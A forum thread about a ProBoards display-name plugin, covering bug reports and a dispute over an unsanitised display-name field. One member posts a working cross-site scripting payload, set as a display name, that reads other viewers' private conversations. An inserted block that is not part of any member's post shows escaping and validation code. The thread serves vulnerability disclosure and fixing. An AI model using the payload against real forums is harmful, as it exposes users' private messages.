Post by Todge on Oct 18, 2018 11:52:10 GMT -8
> Todge, so uhh.. I had some odd things happen with this. xD First, I had a member with the display name "Brynora." As a joke, I changed her name to "Brynora Hand." (long story) I went back and changed her name to normal and it showed the normal name "Brynora" everywhere--in her edit profile, on the homepage... except her main profile still, oddly, showed the old version. So then I erased her display name text field entirely in her edit profile and re-entered it, except it...wrote itself in backward. Like this: [attachment] No idea how that happened. So I disabled this plugin and redid it and everything functioned normally. I don't know exactly what to make of this bug xD

This is bizarre, I can't get either of those errors to occur on my test forum. I guess I can imagine the first error occurring, but I have no idea how the display name can be reversed. Can you make this happen again?
Post by ₪» ⅀ ƪ Ƒ «₪ on Oct 19, 2018 8:03:23 GMT -8
Todge, I am not entirely sure what all happened, either, haha. Verrry weird bug. I'll try to mess around and see if I can recreate it! If I can't, then it might have been a fluke or something. Could it have to do with what Peter said here?

> Todge, Might want to sanitize the output ;)
Post by nuraman00 on Oct 24, 2018 9:45:51 GMT -8
If I go to the Member page, and sort the list by ascending date registered, then I don't see the full names anymore, under "Name". I see the shortened version of the names.
It's only when I initially click on the Member page, that I see the full names.
Can this be fixed?
Post by Todge on Oct 25, 2018 14:39:02 GMT -8
> If I go to the Member page, and sort the list by ascending date registered, then I don't see the full names anymore, under "Name". I see the shortened version of the names. It's only when I initially click on the Member page, that I see the full names. Can this be fixed?

It can indeed...
Post by nuraman00 on Oct 27, 2018 11:59:22 GMT -8
> > If I go to the Member page, and sort the list by ascending date registered, then I don't see the full names anymore, under "Name". I see the shortened version of the names. It's only when I initially click on the Member page, that I see the full names. Can this be fixed?
>
> It can indeed...
Perfect.
Works great.
Thanks again.
Post by ₪» ⅀ ƪ Ƒ «₪ on Oct 27, 2018 13:24:22 GMT -8
Todge, does the latest version have the output sanitized? I don't wanna risk vulnerability to malicious no-good-doers haha =3
Post by Todge on Oct 27, 2018 15:03:27 GMT -8
> Todge, does the latest version have the output sanitized? I don't wanna risk vulnerability to malicious no-good-doers haha =3

The only people that can edit the member names are the account members themselves, and any staff with the powers to edit profiles, so if you have any 'malicious' display names pop-up you will know who the culprits must be.
Post by Peter on Oct 28, 2018 4:37:10 GMT -8
> The only people that can edit the member names are the account members themselves, and any staff with the powers to edit profiles, so if you have any 'malicious' display names pop-up you will know who the culprits must be.

I'm sorry but that is a poor excuse for not fixing a vulnerability that is actually easy to fix. You didn't acknowledge my post on the previous page about it either when I posted the tip for you, so it worries me that you aren't too bothered. Doesn't matter if one forum is using the plugin, or 1000's. XSS vulnerabilities are no joke. It's the most common bug in the world.

I am not a security specialist. There could be vulnerabilities in my plugins, and if someone finds them and lets me know, I would be thankful and release a fix ASAP. But to shrug it off and leave it down to staff or members to "notice" malicious names is the wrong attitude. Not only does it reflect badly on you, but also on the ProBoards service.

Data in the key that is getting used for the display name is executed on all pages that member appears on. So any client viewing the forum will become a victim of the exploit. You assume that the exploit will be something noticeable by other members / staff. So let me show you just a very small sample of what I can do to your plugin. I spent like 2 mins writing this, and it's not even complex. I could improve this easily. But even with this simple exploit, it's pretty dangerous.

```javascript
pb.plugin.key("xl_displayname").set({
  object_id: pb.data("user").id,
  value: '<script>fetch("/conversations").then(r => { return r.text(); }).then(html => { let parser = new DOMParser(); let doc = parser.parseFromString(html, "text/html"); let link = doc.querySelector(".conversation-link"); fetch(link).then(r => { return r.text(); }).then(html => { console.log(new DOMParser().parseFromString(html, "text/html").querySelector("div.message").textContent); }); });</script>'
});
```

All that I have to do is add another line of code and send the content to my server so I can collect them for later viewing. Let's expand the code so it's more readable:

```javascript
fetch("/conversations").then(r => {
  return r.text();
}).then(html => {
  let parser = new DOMParser();
  let doc = parser.parseFromString(html, "text/html");
  let link = doc.querySelector(".conversation-link");

  fetch(link).then(r => {
    return r.text();
  }).then(html => {
    // Log out to console. This could then be sent to a server to collect everyone's
    // messages.
    console.log(new DOMParser().parseFromString(html, "text/html").querySelector("div.message").textContent);
  });
});
```
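Peter's point is that the value stored in the plugin key is written by the member and then rendered into every page as markup, so the fix belongs at render time. The following is an added JavaScript example, not the plugin's code and not Peter's, showing the unsafe interpolation beside the escaped one, plus a plausibility check on the read side; the template, the length cap and the rejected characters are assumptions.

```javascript
// Added example, not the plugin's or Peter's code. A display name read back
// from the plugin key is attacker-controlled: any member can write their own
// record with pb.plugin.key(...).set(), as the post above shows, so it must be
// treated as text, never as markup, wherever it is rendered.

// Escape the characters that break out of HTML text or attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the stored value is interpolated into markup as-is, so a
// value of the shape '<script>...</script>' runs in every viewer's browser.
function renderNameUnsafe(storedValue) {
  return '<span class="xl-name">' + storedValue + "</span>";
}

// Hardened pattern: the same template, but the value is escaped first.
function renderNameSafe(storedValue) {
  return '<span class="xl-name">' + escapeHtml(storedValue) + "</span>";
}

// Defence in depth on the read side (the write side is the member's own
// browser, so it cannot be trusted): reject values that cannot be a name.
// The cap and the rejected characters are an assumed policy; exotic but
// harmless names like the one in this thread must still pass.
const MAX_NAME_LENGTH = 64;
function isPlausibleDisplayName(value) {
  if (typeof value !== "string" || value.length === 0) return false;
  if (value.length > MAX_NAME_LENGTH) return false;
  if (/[<>\u0000-\u001f\u007f]/.test(value)) return false;
  return true;
}

// Constructed inputs: a benign exotic name from the thread and a hostile value
// shaped like the posted payload, with the script body replaced by a marker.
const SAMPLE_NAMES = {
  benign: "₪» ⅀ ƪ Ƒ «₪",
  hostile: "<script>/* attacker code */</script>",
};

// Render only what passes the check, fall back to the username otherwise,
// and escape even then.
function renderChecked(storedValue, fallbackUsername) {
  const name = isPlausibleDisplayName(storedValue) ? storedValue : fallbackUsername;
  return renderNameSafe(name);
}
```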
Post by nuraman00 on Oct 28, 2018 9:31:57 GMT -8
Is that script posted above logging posts to the console, or private messages to the console?
Where did you enter that code? In the plug-in file itself, or in one of the UI templates?
Post by nuraman00 on Oct 28, 2018 9:35:50 GMT -8
I have another question.
When auto-completing a name, it seems that I have to use the username, not the display name. If someone has a different display name than user name, then someone has to know what the user name is, to correctly finish the autocomplete.
Is this the expected behavior? Just asking a question. Not saying this should be fixed, or needs to be fixed.
To me, it seems like a little bit of a disconnect. Since people generally see what the display name is, and not the user name. But again, maybe that's the expected behavior for different reasons. So just thought I'd ask.
Post by Todge on Oct 28, 2018 10:03:56 GMT -8
Version 0.0.3 fixes the issue Peter ranted about above. Peter, I did not even take into consideration that anyone would write to the key outside of the plugin itself, I was not ignoring you, with the ' ' you added I assumed you were just joking about the weird output ₪» ⅀ ƪ Ƒ «₪ was getting. If I had thought that anyone would write malicious code into the plugin it would never have been made public in its original form.
Post by nuraman00 on Oct 28, 2018 11:57:11 GMT -8
> Version 0.0.3 fixes the issue Peter ranted about above. Peter, I did not even take into consideration that anyone would write to the key outside of the plugin itself, I was not ignoring you, with the ' ' you added I assumed you were just joking about the weird output ₪» ⅀ ƪ Ƒ «₪ was getting. If I had thought that anyone would write malicious code into the plugin it would never have been made public in its original form.
I installed this version.
I'm not seeing the full SNs under the "name" on the Member List anymore.
In fact, when I go to a post made by such a user, I'm not seeing their display name either. Just the user name.
Post by Todge on Oct 28, 2018 14:30:38 GMT -8
> I installed this version. I'm not seeing the full SNs under the "name" on the Member List anymore. In fact, when I go to a post made by such a user, I'm not seeing their display name either. Just the user name.
The username should only be visible when you hover over the display name, there is no way this plugin can cause the usernames to be displayed instead, at worst you would just see the original display name. Can you please post a link to a thread where you are having this problem so I can take a look. Thanks.
Post by nuraman00 on Oct 28, 2018 16:06:29 GMT -8
> > I installed this version. I'm not seeing the full SNs under the "name" on the Member List anymore. In fact, when I go to a post made by such a user, I'm not seeing their display name either. Just the user name.
>
> The username should only be visible when you hover over the display name, there is no way this plugin can cause the usernames to be displayed instead, at worst you would just see the original display name. Can you please post a link to a thread where you are having this problem so I can take a look. Thanks.
This plugin was working great in versions 1 and 2.
When I was in a thread, I was seeing the display name.
And after the fix in version 2, when I was on the Member page, I was seeing the display name.
Now, if you look at post # 141:
The SN it is showing is "wwtcbwsr". After I had installed versions 1 and 2 of the plug-in, it was showing the full long name, "WhereWouldTheClippersBeWithoutSeanRooks".
Furthermore, I just went to his/her profile. I see it lost the display name. I think it happened after I installed version 3 of the plug-in. I tried changing it right now.
I am getting an error "JS Error: TypeError: XLName is undefined".
Furthermore, under the "Name" section of the member page, it is not showing the full names either.
If I look at the profile for "windsoruk", the display name is "WindsorUK". But it is showing "windsoruk" under Name.
Previously, in versions 1 and 2 of the plug-in, it was showing the display name.
Post by nuraman00 on Oct 28, 2018 16:07:20 GMT -8
> I have another question. When auto-completing a name, it seems that I have to use the username, not the display name. If someone has a different display name than user name, then someone has to know what the user name is, to correctly finish the autocomplete. Is this the expected behavior? Just asking a question. Not saying this should be fixed, or needs to be fixed. To me, it seems like a little bit of a disconnect. Since people generally see what the display name is, and not the user name. But again, maybe that's the expected behavior for different reasons. So just thought I'd ask.
Also, Todge, what are your thoughts on this topic?